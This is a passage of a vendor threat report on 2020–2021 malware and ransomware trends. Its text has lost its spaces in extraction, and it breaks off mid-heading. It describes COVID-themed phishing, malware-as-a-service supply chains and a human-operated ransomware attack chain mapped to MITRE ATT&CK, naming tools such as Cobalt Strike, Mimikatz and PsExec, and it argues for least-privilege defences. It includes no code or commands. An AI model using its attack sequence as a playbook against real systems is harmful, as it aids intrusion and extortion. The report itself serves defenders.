Beyondtrust：2021 惡意軟件威脅報告-勒索軟件實驗室分析、網(wǎng)絡釣魚趨勢及應對方法Malware Threat Report 2021

Malware

ThreatReport2021

BeyondTrustLabsAnalysisofRansomwareandPhishingTrends&HowtoMitigateThem

JamesMaude

LeadCybersecurityResearcher

BeyondTrust

TABLEOFCONTENTS

ExecutiveSummary

3

SecurityChallengesof2020-2021

4

TheIncreasedAttackSurface-BringingThreatsHom

e

4

TheNewPerimeter

7

MorePrivileges,MoreProblems

9

PrivilegedApplicationVulnerabilities

11

SummaryofSecurityChallenges

13

MaturityoftheMalwareEcosystem

14

Human-OperatedRansomware

16

B

eyondTrustMalwareLabs-AnalysisofMalwareThreats

21

OverviewofMalwareStrains

22

CommonDenominators

27

MostCommonTechniquesAfterInitialMalwareExecution

29

Lab-TestingBeyondTrustTrustedApplicationProtectionAgainstTopMalwareStrains

31

DivingIntoMITREATT&CK?FrameworkDefinitions&Mitigation

s

34

T1047WindowsManagementInstrumentation(WMI)

35

T1204.002UserExecution:MaliciousFile

36

T1059.001PowerShellusedforinitialexecution

37

T1059.003WindowsCommandShell(CMD)

38

OtherTechniques

39

The5CriticalStepstoCompleteEndpointSecurity

40

AdditionalResources

43

Appendix:ThreatSamplesTest

ed

44

Note:Thelab-basedresearchinthisreportpertainsonlytoWindowsdesktopsandservers.

2

MalwareThreatReport2021

>

ExecutiveSummary

Thisresearchreportprovidesinsightsandanalysis

intothreatsandprivilegedaccountmisuseon

Windowsdevicesacrosstheglobe.Thisresearchis

fromthesameBeyondTrustLabsteamthatpublishestheannual

MicrosoftVulnerabilitiesReport

.

Thisreportisbasedonreal-worldmonitoringand

analysisofattacksbetweenQ12020andQ12021

discoveredinthewildbytheBeyondTrustLabsteam,

withcollaborationfromcustomersandincident

responseteamsusingBeyondTrust’sproducts.In

additiontogeneralinsightsintothethreatlandscape,thereportalsodivesintoreoccurringthreatthemes

andmapsoutTools,Techniques,andProcedures(TTPs)againstthe

MITREATT&CK?EnterpriseFramework

.

BeyondTrustLabsexploredthe58techniquesinthe

MITREATT&CKFrameworklistsforCobaltStrike

(threatemulationsoftware),and66%ofthetechniqueseitherrecommendusingPrivilegedAccount

Management,UserAccountManagement,and

ApplicationControlasmitigationsorlistAdministrator

/SYSTEMaccountsasbeingaprerequisitefor

thetechniquetosucceed.Therefore,thecontrolof

privilegesandapplicationexecutionisakeydefensivemeasureinmitigatingCobaltStrikeandtools/malwarewithsimilarcapabilities,byreducingtheattacksurfaceanddenyingcodeexecutionandprivilegedrights.

KEYFINDINGS

1Absenttherightprotection,malwarewilldisableendpointsecuritycontrolsand

undermineyoursecurityinvestment.

2Weareobservingagrowing

trendintheuseofnativetoolstoperformfilelessattacksintheinitialstagesuntilastrongfootholdandpersistence

mechanismisestablishedandsecuritycontrolshavebeen

disabled.

3TheMITREATT&CKFrameworkprovidesaneffectivewayto

distillawiderangeofmalwarestrainsandcyberattacksintocomponenttechniques,whichcanthenbemitigated.

4BeyondTrust’sout-of-the-boxpoliciesproactivelydisruptedall150different,common

attackchainstestedinouranalysis.

5Removalofadminrightsandimplementationofpragmaticapplicationcontrolaretwoofthemosteffectivesecuritycontrolsforpreventingandmitigatingthemostcommonmalwarethreats.

3

MalwareThreatReport2021

SecurityChallengesof2020-2021

TheIncreasedAttackSurface:BringingThreatsHome

Securitystaplessuchasnetworkmonitoringandfirewall

technologiesarebecominglesseffectiveastheperimetershiftsfromthecorporateofficetothehomeoffice,or“workfromanywhere”forthatmatter.

Overthepasttwodecades,organizationsinvested

significantlyinshoringuptheircyberdefenses.Someoftheseinvestmentshavebeenrenderedfarlesseffective,evenobsolete,duetothechangesusheredinbythe

pandemic.

Emailfatigueisgreaterthanever.Thedailycommunicationsthatoncehappenedin-person,orovertheofficephone,

haveshiftedincreasinglytoemails,onlinemeetings,andothercommunicationtools.

Thismeansthatusersarenotonlyseeinghighervolumesofemails,butalsoreceivingemailsfromawiderrangeofsources,suchas:

IColleaguestheyhavenevermetIProspectivesuppliers

INewclients

IOtherdepartmentsaboutpolicies,tools,andinformationneededtosupporthomeworking

4

MalwareThreatReport2021

Despitetheriseofmoderncollaborationsoftware,most

officecommunicationstillrevolvesheavilyaroundsendingandreceivingemailswithdocuments,links,orother

attachments.Forexample,anHRteamexpectstoreceiveresumes,andafinancedepartmentexpectsinvoicesorcontracts.

Theexpectationofreceivinglegitimatecommunications

viaemail—oftenfromsourcesunknownorunanticipated—makesiteasyforanattackertotailoranemailphishing

campaignandachieveahighsuccessrate.Departmentswithaccesstothemostdocumentsanddataareoftenthemostlikelytofallvictimtophishingefforts,subsequentlyleadingtoaransomwareorothermalwareattack.

Figure1Exampleof

COVID-19themedphishingemail

linkingtomaliciousWorddocument

5

MalwareThreatReport2021

Consequently,threatactorslaunchedhighlysuccessfulcampaignsthatusetargetedphishingemailstosociallyengineertheoverwhelmedremoteworkerintoenteringtheircredentialsoropeninganinfecteddocument.

>InBeyondTrustLabs,

weobserveda200%increaseinphishingemailswiththemajoritybeingCOVID-19themed.

Thethreatactorssendingemailsimpersonatedavariety

ofgovernmentandnon-governmentorganizations,fromtheWorldHealthorganization(WHO)and

CenterforDiseaseControl(CDC)togovernmentdepartmentsandpharmaceuticalcompanies.

TheseemailcampaignspromptedtheDepartmentof

HomelandSecurity(DSH),Cybersecurity&InfrastructureSecurityAgency(CISA)andtheWorldHealthOrganization(WHO)toissuecommunicationswarningusersofthe

risks.TheUnitedKingdomNationalCyberSecurity

Centrealsolaunchedacampaigntobe“CyberAware”followingthetakedownof2,000scams,including471fakeonlineshopsforCOVID-19relatedservices.

WHOCommunicationWarningUsersof

PhishingTechniques

TheWorldHealth

Organizationwill:

INeveraskforyour

usernameandpasswordtoaccesssafety

information

INeveremailattachmentsyoudidn’taskfor

INeverchargemoneytoapplyforajob,registerforaconference,or

reserveahotel

INeverconductlotteriesorofferprizes,grants,certificatesorfundingthroughemail

6

MalwareThreatReport2021

>

TheNewPerimeter

“JustliketheicewallinGameofThrones,

organizationsspentyearsbuildinga

technologicalperimeterwalltokeepthreats

out.Despitecriesthat“theperimeterisdead,”theyhavecontinuedtoplacealotoffaith(andinvestment)init.Therapidtransitiontoremoteworking,andthesuddendissolutionofthe

perimeter,hasforcedanabruptshifttofocusonsecuringidentitiesandend-userdevices.ITdepartmentsareunderpressuretoupgrade

capacitiesfastandthisresultsinchangingorreplacingexistingsystemswithlittletimetodothoroughsecuritytests.Vulnerabilitiesintheremoteaccessinfrastructureandaccessprotocolsmayremainundetectedandcanbeexploitedincyberattacks.”

InternationalMonetaryFund:

CybersecurityofRemoteWorkDuringthePandemic

Toadapttosocialdistancinginitiativesorwork

fromhomepolicies,businesseswereforcedto

acceptunprecedentedrisksthatwouldhavebeeninconceivableafewmonthsprior,justtocontinueoperatingandkeepusersproductive.

Insomecases,olddesktopmachinesthatnooneever

imaginedleavingthecorporatenetwork,werebeing

loadedintocarsandtakenhometopotentiallyvulnerablenetworksthattheywereneverintendedtojoin.

Awiderangeofremote

accesstoolsandcloud

serviceswerehastilyspunup,sometimesovernightoroveralong,sleepless

weekend.

Inmanycases,duetothe

speedofthedeployments,userswereallgivenbroad

accesstodataandsystemsasbusinesserredonthesideoffreedomandflexibilitytoensurethatuserswereabletoworkremotely.

7

MalwareThreatReport2021

Attackersoverwhelminglyseekouttheeasytargets

thatwillyieldafastpayday.Thus,cybercriminalsquickly

capitalizedonthissuddenshift,rapidlyidentifyingthat

notonlyhadtheattacksurfacevastlyincreased,butso

didtheaccesstodataandsystems.Oneoftheoutcomesofthesefactorswasreflectedinthesurgeofsuccessful

ransomwarecampaigns,asattackerswereabletolandandexpandwithnewfoundease.Sincethepandemic,therehasbeenathirdmoreransomwarefamiliesand560,000new

piecesofmalwaredetectedeveryday(DataProt,2021).

>BeyondTrustLabshasalso

witnessedanincreasedin

specialistRansomware-as-a-Service(RaaS)operators,whichnotonly

provideservicesthatlowerthetechnicalbarriersforwould-becyber-criminalsbutarealsofarmorecapableoftakingdownlargeenterprises.

Inthisenvironment,

it’shardlysurprising

thatmultimillion

dollarransomsarenowcommonplace.These

ransomsarenotjust

quickcashpayouts,

butseedroundsforthe

ransomwareoperators,whocontinuetoinvestinbetterinfrastructureandleveragingzero-

dayexploits.

Manyorganizationswhopreviouslyhadrobustmonitoringinplaceontheinternalnetwork—helpingtoidentifymalwaretrafficandlateralmovement—havebeenblindtothenew

andevolvingattacktechniques.Thisisbecausesomany

endpointsnowoperatepartiallyorfullyoutsideofthe

network.Tocompoundthisproblem,therewasanearly

900%surgeinfilelessmalwareattacks(InternetSecurity

ReportforQ42020,WatchGuardTechnologies)which

ofteninvolveattackersexploitingnativeapplications,like

PowerShell,toperformtasks.Thisreducesthechanceof

detectionasmanysolutionsarelookingfornewapplicationsappearingratherthanexisting,legitimate,toolslaunching.

8

MalwareThreatReport2021

MorePrivileges,MoreProblems

Overthepastfewyears,mostorganizationshavebeenadvancingtowardaleastprivilegeapproach,where

usersareonlyallocatedtheprivileges/privilegeaccesstheyneedtodotheirrole.Inmanyindustries,thisis

nowmandatory(NIST,PCI,HIPAA,etc).Duetothe

effectivenessofthissecuritycontrol,itisexpectedthatcompaniesinotherindustrieswillfollow.

Supportingthenewlyremoteworkforcepresented

organizationswithmanychallengesaroundprivileged

access.Forinstance,seeminglytrivialtasks,like

installingprinterdriversforthedeviceinthehomeoffice,orthesoftwareneededforanewwirelessheadset,or

updatingthelocaltimeonalaptop,requiredlocaladminrightsthatusersdidn’thave.Tocontinuefunctioning

withoutoverwhelmingsupportdeskswithcallsand

tickets,manyorganizationsgaveusersaccesstolocaladminrightsonatemporaryorpermanentbasis,vastlyincreasingthesecurityrisk.

TheInternationalMonetaryFund(IMF)addressedthis

topicinaspecialseriesofnoteswarningofthepotentialcybersecurityrisksbroughtaboutbyremoteworking

duringthepandemic.ThisincreasedpervasivenessoflocaladminrightshasmadeitsignificantlyeasierforcommonmalwarestrainstousesimpleElevationofPrivilege(EoP)techniquestonotonlygainaccesstoprivilegesonthesystem,butalsousetheseprivilegestodisableorbypassexistingsecuritycontrols.

Thus,it’scriticaltoremovelocaladminrightsandapplymoregranularityaroundprivilegedaccesssecuritycontrols.

Wewereupagainstthe

clockonthisoneand

endedupissuingwork

fromhomelaptopswith

localadminrightsfortheolddesktopusergroups.

Wealsohadtoreactto

aninfluxofsupportcalls

bygrantingtemporary

adminprivilegestoour

existinglaptopusergroups.Thiswasallbecausewe

didn’thaveasolutioninplaceatthetime.PrivilegeManagementhasquickly

becomeourtoppriority.

HeadofITOps,EngineeringFirm

9

MalwareThreatReport2021

>“Employeesshouldnothaveadministration

rightsonfirm-ownednotebooks,security

hardenedconfigurationsandup-to-date

endpointsecuritysolutionsshouldbeinplace,

connectionsecurityparametersshouldbesetaccordingtogoodpracticesandshouldbelocked,andthecorporateremoteaccessinfrastructureshouldbetightlycontrolled.”

InternationalMonetaryFund:

CybersecurityofRemoteWorkDuringthePandemi

c

10

MalwareThreatReport2021

PrivilegedApplicationVulnerabilities

Alongsidetheincreaseinuserswithadminrights,wehaveobservedarisingtrendinsoftwarethatdoesnotproperlymanageprivileges.

The2021editionoftheBeyondTrustLabsannual

MicrosoftVulnerabilitiesReport

foundthefollowing:

IElevationofPrivilege(EoP)vulnerabilitiesincreased3xfrom2019to2020

ITheseaccountedfor44%ofthe1,268criticalMicrosoftvulnerabilitiessurveyedin2020

IRemoteCodeExecution(RCE)wasthenexthighestcategory(27%ofthecriticalvulnerabilities)

Theissueofimproperprivilegemanagementhas

beenhighlightedbyMITRE,whoincludedCWE-269–ImproperPrivilegeManagementintheir“2020CWETop25MostDangerousSoftwareWeaknesses.”

3X

INCREASE

EoPvulnerabilitiesYoY2019-2020

44%

EoPYoYincrease2019-2020

CWE-269:

ImproperPrivilegeManagement

Thesoftwaredoesnot

properlyassign,modify,track,orcheckprivilegesforanactor,creatinganunintendedsphereof

controlforthatactor.

MITREATT&CKFramework

11

MalwareThreatReport2021

Asshowninthechartbelowthisweaknesshasbeentrendingupwardsalmostexponentiallysince2016.

Thus,itismoreimportantthanevertocontrolthe

privilegesgranted,notonlyattheuserlevel,butattheapplicationlevel,topreventthatsphereofcontrolbeingcreatedforathreatactor.

VulnerabilityTypeChangebyYear

However,theissuesofimproperprivilegemanagementarenotjustaWindowsproblem,asthedatashown

abovetrackscommonweaknessesagainstavarietyofsoftwareandoperatingsystems.Whileitisnotalwayspossibletocontrolhowthesoftwareitselfhandlesprivileges,theprincipleofleastprivilege(POLP)canbedirectlyappliedtotheapplicationtocontrolrisk.

Fromrestrictedtokens,tocontrollingchildprocess

inheritance,thereareavarietyofwaysarobustendpointprivilegemanagementsolutioncanmitigatetherisk

ofimproperprivilegemanagementbyapplications.

Figure2CWE-269

ImproperPrivilegeManagement

hasbeenvastly

increasingsince2016

Source:

NIST

Thisvisualizationisa

slightlydifferentview

thatemphasizeshowtheassignmentofCWEshaschangedfromyeartoyear.

12

MalwareThreatReport2021

Summaryof

SecurityChallenges

In2020,theattacksurfaceexpandedmassivelydueto:

ITheexpansioninusecasesforgrantingaccesstoprivileges

IAnincreaseinsoftwarebeingvulnerabletodangerousvulnerabilities

IThewidespreaduseofremoteaccessthatresultedfromamassiveshifttoremoteworking

Attackersshrewdlyexploitedthesenewcyberexposures,often

usingelevationofprivilegeattacksandsophisticatedmalware

campaigns,frequentlyplayingontheemotionsandfearsofusers.

Threatactorsworkceaselesslytoevolvetheiroperationsandhavematuredsignificantlyoverthepastyear.Inournextsection,wewillexplorethecontinuingevolutionofthecybercrimeindustry.

13

MalwareThreatReport2021

Maturityofthe

MalwareEcosystem

>Paralleltolegitimatesoftware

companiesandthetrendtowardsSaaS,threatactorsareshiftingtoMalware-as-Service(MaaS)

modelswithspecialistsemergingindifferentareas,including

enterprisecredentialsales,initialaccesstoatargetorganization,lateralmovementcapability,orpayloaddelivery.

Aswithanygrowthindustry,wehaveseenalotofchangesinmalwareecosystemsandtheireconomicmodels.

Today,thereareoftenmanydifferentpiecesofmalware

thatcometogetherinanattack.Amodernransomwareattackcouldbecomprisedofmultiplethreatactors,tools,andplatforms.

14

MalwareThreatReport2021

Forexample:

IThreatactorsrenttheNecursbotnetanduseittodistributemaliciousspam

ISpamcontainsmaliciousdocumentsthatlaunchesTrickbot

ITrickbotisusedtoharvestcredentials,accessemails,andforlateralmovementacross

thenetwork

IWithwidespreadcompromiseofthetarget

network,thethreatactorsellsbackdooraccesstothenetworktothehighestbidder

IThebuyerthendeploysRYUKransomware

viatheTrickbotcommandandcontrolservers

Thisspecializationnotonlydrivesinnovationthroughcompetition,butalsoreducesthethreatactor’srisk.Ifonepartofthechainistakendown,theotherpartscanquicklyshifttoanothersupplier.

Alternatively,ifyou’reathreatactorlookingtoavoidbeingblockedbyantivirus(AV)tools,thenyoucan

justbuyaccesstosystemswhereTrickbothasalreadybreachedthenetworkanddisabledtheAVsoftware.

Thisapproachmakesmodernmalwareconsiderablymoreresilienttotakedownattempts,whilealso

settingthetechnicalbarforillicitentrymuch

lower.Afterall,anattackernolongerhastobean

accomplisheddeveloper,socialengineer,orskilled

hacker.Theycannowbuy,ratherthanbuild,toolsandusetheMaaSplatformstoorchestratesophisticatedmalwarecampaigns.

Inthischainofevents,

wecanseeseveral

malwareplayersandtheirtoolswithintheirown

specialties.Thismodularapproachallowsthe

malwareauthorstofocusonexcellenceinonearea.

15

MalwareThreatReport2021

Human-OperatedRansomware

Asthreatactorsseektomaximizethedisruptionto

organizationsandextractthehighestransompayments,theransomwaremodelisshiftingtowardshuman-driven,enterprise-wideattacks.

Ratherthancreateanautomatedwormthatself-

propagatesacrossthenetwork,thelatestgenerationofransomware-as-a-service(RaaS)willtreadlightly,

establishingafootholdinthenetworkofalargeorganization.

Usingcommonpenetrationtestingtools–suchas

CobaltStrikeorPowerShellEmpire–theythensurveythenetworkandspreadusingprivilegeescalationstogaincontrolofcriticalsystemsanddisablesecurity

controls,beforefinallyencryptingkeysystemsandexfiltratingdata.

Human-operated

ransomwarecampaignsposeasignificant

andgrowingthreat

tobusinessesand

representoneofthemostimpactfultrendsincyberattackstoday.

Inthesehands-on-

keyboardattacks,whicharedifferentfromauto-spreadingransomwarelikeWannaCryor

NotPetya,adversaries

employcredentialtheftandlateralmovement

methodstraditionally

associatedwithtargetedattackslikethosefromnation-stateactors.

Human-operated

RansomwareAttacks:

APreventableDisaster

16

MalwareThreatReport2021

TheEvolutionofRansomware

ArchievusRevetonCryptolockerWannacryREvilDarkside

200520122013201720192021

BasicRansomware:Automated,singleendpoint

BusinessRansomware:Automated,singleendpoint

EnterpriseRansomware:Automated,multipleendpoints

TailoredRansomware:Manuallyorchestrated

2005IndividualTargeting

Archievususesasymetric

encryptiontoencryptfilesin“Documents”folder,forcingusertobuydecryption

throughwebsitepurchases.

2013BusinessTargeting

Cryptolockerstartsusing

professionalemailstotargetbusinesses.Ransomsdataonasingleendpoint.

2017EnterpriseWorm

Wannacryexploits

CVE-2017-0145topropogate

acrossnetworks.Ransoms

dataacrosstheentirenetwork.

2019TailoredOperations

Maximizingbusinessdisruptionsandpressuretopayaransom,attacks

becomemoretailoredandless

automated.Humansusingpen-testingtoolssearchthenetworkfortargets.

Overthepast15years,ransomwareattackshave

shiftedfromtargetingafewfiletypesinasinglefolderononeendpoint,towidespreadencryptionofentirenetworksofsystems.Whiletakingdownabignetworkandmanysystemscanresultinamoredevastating

attackandgreaterbusinessimpact,italsolengthenstheattackchain,providingmoreopportunitiesto

detectandpreventtheattack.

Figure3Howransomwarehasevolvedasitseeksoutmore

criticaldataandsystemsashighervaluetargets

Fromadefensivepointofview,thislatestevolution

ofransomwaremakesitfarmoredifficulttoidentify

attacksbyusingtraditionaldetectiontools,astheyarelesslikelytouseagenericpayload.Instead,human-

operatedransomwareattacksinvolvearealpersonusingprofessionaltools.

17

MalwareThreatReport2021

Thishands-onapproachcanwageahighlytailoredattackonthetargetthatfrequentlyinvolves

obfuscatingcodeandleveragingfilelesstechniquestomaintainalightfootprintandtoavoidtriggeringalarmbellswhiletheyexplorethesystems.

FilelesstechniquesmayexploitnativeapplicationslikePowerShellor.NETdevelopertoolstorunscriptsandlaunchpayloads,avoidingintroducingnewapplicationstodiskthatmaybedetectedorblocked.

Figure4Below,exampleof

ahuman-operated

ransomwarecampaignobservedinthewild

AttackChainPhase

MITREFrameworkExample

>TheRoleof

PrivilegeManagementforWindows

PreventsPowershellfrombeinglaunchedfromaphishing

attachment

Preventsaccesstolocaladminrights,mitigatingcredentialaccess,

privilegeescalation

anddefensiveevasion

Preventsmalwarepayloadexecuting

HumanOperatedAttackChain

Access

Environment

T1566Phishing

InitialAccess

Trickbotviaphishingemail

T1548.002UACBypass

Execution&LocalElevation

CobaltStrikeorPowerShellEmpire

Persist,Recon,Traverse

andSpread

T1134AccessTokenManipulation

T1003&T1003.001CredentialDumping

CredentialAccess

UsingLaZange,Mimikatzorothertools

T1055ProcessInjection

PrivilegeEscalation

ControloverValidAdminAccounts

T1053ScheduledTask/Job

T1078ValidAccounts:DomainAccounts

Persistence

NewDomainAdmin(DA)Accounts

T1087AccountDiscovery

T1033SystemOwner/UserDiscovery

Discovery

ReconandenumerationusingBloodhound

T1035ServiceExecution

LateralMovement

PsExecorothertools

T1562ImpairDefenses

DefenseEvasion

TamperingwithA/V&securityservices

Execute

Objective

T1086DataEncryptforImpactImpact

InvokeRyukransomwarepayload

18

MalwareThreatReport2021

Asshowninthepreviouspageattackchainchart,therearemanystagesinahuman-operated

ransomwarecampaignastheattackerseeksdeeperaccessandcontrolofthenetwork.

>Startingfromthephishing

email,theattackwillexploit

privilegesandtheability

toexecuteapplicationslike

PowerShellto“l(fā)andandexpand,”

eventuallyleadingtototal

compromiselargeenterprises.

Professionaltools,suchasCobaltStrike,offeranattacker

severaltechniquesforexecutingcode,capturingcredentials,andmovinglaterallywithinanetwork.Suchtoolsare

popularwiththreatactors.APT29,WizardSpider,and

ChimeraarejustafewofthecybercrimegroupsthathavebeenobservedusingCobaltStrikeaspartoftheirattacks.

MITREhas

mappedthefunctionality

ofCobaltStrikeandrecommendsPrivilegedAccountManagement

M1026andExecutionPreventionM1038asmitigationsagainstarangeofthetool’stechniques.

Infact,ifwetakeadeeperlookatthe58techniquesMITRElistsforCobaltStrike,66%ofthemeitherrecommend

usingPrivilegedAccountManagement,UserAccountManagement,andApplicationControlasamitigation,orlistAdministrator/Systemaccountsasbeinga

prerequisiteforthetechniquetosucceed.Therefore,

thecontrolofprivilegesandapplicationexecutionisakeydefensivemeasureinmitigatingthisspecifictool,

andonessimilartoit,throughareductionintheattack

surfaceanddenyingcodeexecutionandprivilegedrights.

Trickbot,andthe

Ryukoperators,alsotakeadvantageof

usersrunningaslocaladministratorsin

environmentsandusethesepermissionstodisablesecuritytoolsthatwouldotherwiseimpedetheiractions.

Human-operated

RansomwareAttacks:

APreventableDisaster

19

MalwareThreatReport2021

>Whileransomwarehasclearlyevolved,

thefundamentalneedstoexecutecode

andleverageprivilegeshavelargely

remainedconsistent.Whetheritisthebasicransomwarehittingasingleendpoint,orasophisticated,tailoredattack,thebenefitsofproactivelyreducingtheattacksurfacebyremovingadminaccountsandcontrollingapplicationexecutionareuniversal.

Whenitcomestohuman-operatedransomware,oneoftheattacker’skeyobjectivesistofindaccountswithlocaladminrights.Attackersexploittheseaccountstodisablesecuritycontrolsandstealcredentialsthatallowthemtomovelaterally,deeperanddeeperintoanenvironment.

TheexampleattackchainshowninFigure4couldhavebeenthwartedatanearlystagebysimplypreventingthephishingdocumentfromlaunchingPowerShellandeliminating

thelocaladminrightstopreventcredentialdumping.

Wealsowanttohighlighttheimportanceofmitigatingcredentialdumpingtechniquesastheseareoften

criticalstepsforanattackertoperformdiscovery,lateralmovement,persistence,anddefensiveevasion.

Theattacker’sgoalisto“l(fā)andandexpand”—asimplepathtoprivilegedcredentialsmakesthisfareasier

toachieve.Whenyoumitigatetheattacker’sabilitytoexecuteandperformcredentialdumping,youdon’tjustmitigatethosetechniques,butalsoabroadrangeof

otheronesthathingeoncredentialaccesstosucceed.

20

MalwareThreatReport2021

BeyondTrustMalwareLabs

AnalysisofMalwareThreats

(May20